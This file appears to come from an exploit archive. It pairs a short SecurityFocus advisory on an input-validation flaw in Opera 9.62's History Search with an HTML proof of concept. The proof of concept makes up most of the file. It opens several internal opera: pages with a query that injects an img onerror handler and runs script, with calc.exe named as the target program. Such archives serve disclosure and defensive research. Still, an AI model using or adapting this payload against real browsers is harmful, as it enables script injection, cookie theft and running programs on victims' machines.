platforms/windows/remote/32555.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32015/info
Opera Web Browser is prone to an input-validation vulnerability because of the way it stores data used for the History Search feature.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, obtain sensitive information, alter the browser's configuration settings, or execute local programs in the context of the browser; other attacks are also possible.
Opera Web Browser 9.62 is vulnerable.
<!-- # OPERA 9.62 Remote Code Execution # Vulnerability Found By NeoCoderz # Email : NeoCoderz1[at]msn[dot]com --> <html> <script> function execcalc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalc()">Click me...(opera:config)</a><br> <script> function execcalca() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br> <script> function execcalcb() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br> <script> function execcalcc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br> <script> function execcalcd() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br> </html>